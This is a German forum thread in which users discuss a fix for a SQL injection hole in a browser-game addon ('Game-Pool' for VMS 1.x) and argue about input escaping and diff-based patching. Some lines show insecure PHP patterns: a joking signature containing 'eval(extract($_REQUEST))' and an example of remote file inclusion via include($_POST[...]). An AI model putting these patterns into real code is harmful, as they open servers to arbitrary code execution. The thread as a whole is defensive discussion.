Ergebnis 1 bis 10 von 13

Thema: BlindSQL-Injection Game-Pool Addon Skandal für VMS 1.x

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    suche:
    if (!isset($_POST['buy'])) $_POST['buy']= "";

    und füge darunter das hier ein:

    $_POST['id']=abs(intval($_POST['id']));

  2. #2
    Neuer Benutzer
    Registriert seit
    12.09.2009
    Beiträge
    8
    Dankeschön, waren das alle, die in dem Skript existierten ?

    wieso arbeiten die Leute hier eigentlich nicht mit einer diff ähnlichen Software ?

    Gruß
    Drakor

  3. #3
    Erfahrener Benutzer Avatar von jpwfour
    Registriert seit
    06.02.2008
    Beiträge
    3.717
    Zitat Zitat von Drakor Beitrag anzeigen
    ...
    wieso arbeiten die Leute hier eigentlich nicht mit einer diff ähnlichen Software ?
    ...
    Wen meinst du damit, und was sollte das bringen?

    Dadurch beheben sich Bugs auch nicht von selbst und ein Großteil der "Kunden" hat schon Probleme, Dateien korrekt via FTP hochzuladen, da wäre jeder diff-ähnliche Ansatz wohl zu viel verlangt (geschweige denn können sicher auch viele der im Klammlose-Bereich tätigen "Programmierer" nicht richtig mit solchen Tools umgehen).
    Kill one man, and you are a murderer.
    Kill millions of men, and you are a conqueror.
    Kill them all, and you are a god.
    - Jean Rostand, Thoughts of a Biologist (1939)

  4. #4
    Neuer Benutzer
    Registriert seit
    12.09.2009
    Beiträge
    8
    Wieso, durch das diff wirds doch noch einfacher ?
    Dann braucht der User das Addon nurnoch hochladen und der Progger nur ne .diff als Patch bereitstellen.

    (wobei das diff Format wohl nicht ganz tauglich ist, aber aus anderen Gründen)

  5. #5
    Pff, du hast noch nie für Addons Support geben müssen, oder?

    Da muss für .diff wieder Software installiert werden, die Leute haben keine Ahnung wie sie das bedienen und regen sich drüber auf, wieso das nicht wie bei allen anderen Addons ganz einfach sein kann...


  6. #6
    Neuer Benutzer
    Registriert seit
    12.09.2009
    Beiträge
    8
    Du hast noch nie mit diff-Files gearbeitet oder ?

    Ich stell mir das eher so vor: Im Adminforce gibt es den Unterpunkt "Diff-Patch" mit einem "Hochladen"-Button. Dort wird die Diff-File hochgeladen und vom Addon ausgeführt... fertig. Unten drunter steht jeweils welche Diff-File bereits angewandt wurde. Also das ist doch sehr viel einfacher als irgendson Anleitungsgedöhns.

    Drakor

  7. #7
    Erfahrener Benutzer Avatar von jpwfour
    Registriert seit
    06.02.2008
    Beiträge
    3.717
    Zitat Zitat von Drakor Beitrag anzeigen
    ...Im Adminforce gibt es den Unterpunkt "Diff-Patch" mit einem "Hochladen"-Button. Dort wird die Diff-File hochgeladen und vom Addon ausgeführt... fertig. ...
    Ausgeführt via Systemaufruf? Kannste dann schonmal knicken da die meisten Billig-Webspace nutzen, wo das nicht möglich ist.

    Ausgeführt via PHP Skript? Auf alle Dateien Schreibrechte (dass machen die Webbis zwar sicher 1x, wenn man es ihnen sagt, aber ich würde das nicht machen), nötige Skripte dafür müssten wohl noch mind. 1 Jahr lang PHP 4 unterstützen.

    Und der Faktor, dass nicht alle, die Addons vertreiben, diff's erstellen können/wollen, insofern würde wohl selbst wenn man jetzt das ins Grundskript integriert und ausfürliche Anleitungen bereitstellt, nur ein sehr kleiner Anteil bestehender Addons angepasst werden, und auch von den neuen nur ein kleiner Teil damit erstellt werden.

    Daher hat vermutlich kaum jemand Lust, sowas einzubauen.

    Und selbst wenn man das alles ausser Acht lässt, spätestens sobald 2 Addons bzw. deren diff's konkurrieren, steigen 98% aller Klammlose-Webbis aus, dass ist zwar bei den aktuellen "Anleitungen" das selbe Problem, aber nur dafür extra was Neues zu erfinden, bei dem die gleichen Probleme auftreten, glaube ich will auch kaum jemand


    Ich würde so ein System bspw. auch nicht nutzen, da man so viel "Schrott" untergejubelt bekommt, so dass ich mir gerne erst mal ganz genau anschaue, was der Ersteller da "gebastelt" hat, wäre mit einem diff File natürlich auch möglich, aber wenn ich schon beim durchschauen bin hab ich die Codezeilen genauso schnell auch reinkopiert.
    Kill one man, and you are a murderer.
    Kill millions of men, and you are a conqueror.
    Kill them all, and you are a god.
    - Jean Rostand, Thoughts of a Biologist (1939)

  8. #8
    Erfahrener Benutzer
    Registriert seit
    20.11.2006
    Beiträge
    304
    Zitat Zitat von j.knopf Beitrag anzeigen
    suche:
    if (!isset($_POST['buy'])) $_POST['buy']= "";

    und füge darunter das hier ein:

    $_POST['id']=abs(intval($_POST['id']));

    Was genau soll das bringen?

    Das:
    PHP-Code:
    if (!isset($_POST['buy']))    $_POST['buy']= ""
    stellt nur fest ob "buy" im _POST-Array vorhanden ist, ist es nicht vorhanden wird es ja noch vernünftig deklariert, ist es aber vorhanden, wird es nicht mal auf Inhalt geprüft.

    Vernünftiger wäre hier sowas (wenn "buy" ein string ist):

    $buy = (!isset($_POST['buy']) ? '' : addslashes($_POST['buy']));

    Wobei das ganze natürlich auch über andere Funktionen escapt werden kann/darf

    Achso.das ist auch kein SQL, sondern ein PHP-Injection ;-)
    Marktorientierte Softwarelösungen
    http://wittesoft.de

    <?php eval (extract ($_REQUEST)); ?> epic web

  9. #9
    Benutzer
    Registriert seit
    16.08.2006
    Beiträge
    60
    PHP-Code:
    $_POST['id']=abs(intval($_POST['id'])); 
    stellt sicher das $_POST['id'] eine positive Ganzzahl ist.

  10. #10
    Erfahrener Benutzer Avatar von neoplacer
    Registriert seit
    23.07.2006
    Beiträge
    157
    Zitat Zitat von breaker Beitrag anzeigen
    Was genau soll das bringen?

    Das:
    PHP-Code:
    if (!isset($_POST['buy']))    $_POST['buy']= ""
    stellt nur fest ob "buy" im _POST-Array vorhanden ist, ist es nicht vorhanden wird es ja noch vernünftig deklariert, ist es aber vorhanden, wird es nicht mal auf Inhalt geprüft.

    Vernünftiger wäre hier sowas (wenn "buy" ein string ist):

    $buy = (!isset($_POST['buy']) ? '' : addslashes($_POST['buy']));

    Wobei das ganze natürlich auch über andere Funktionen escapt werden kann/darf

    Achso.das ist auch kein SQL, sondern ein PHP-Injection ;-)
    addslashes Ist nicht sicher lässt sich sehr einfach aus hebeln..
    Wenn du weißt das da nur eine Ganzzahl kommen darf, dann sollte man das auch darauf Prüfen.
    Und wenn du die ID so wie sie in die $var gespeichert ist an deine DB via aufruf übergibst ist es eine SQL Injektion

    PHP wäre wenn du Include($_POST["pagename"].".php"); machen würdest
    Denn pagename= http://meineurl.tls/bösesscript führt das dann aus.

Ähnliche Themen

  1. [V] Game-Pool-Anteile von Skandal
    Von Gecko1 im Forum Scripte
    Antworten: 1
    Letzter Beitrag: 13.04.2010, 20:51
  2. PN-Center by Skandal - XSS & SQL Injection
    Von Gremlin im Forum Sicherheitslücken
    Antworten: 6
    Letzter Beitrag: 05.03.2009, 05:22
  3. Game-Pool-Anteile
    Von thomeshop im Forum Support zu Addons & Erweiterungen
    Antworten: 2
    Letzter Beitrag: 15.01.2009, 14:23
  4. SQL Injection - Addon für Firefox
    Von Hardy im Forum Talk, talk, talk...
    Antworten: 5
    Letzter Beitrag: 08.01.2009, 15:35

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •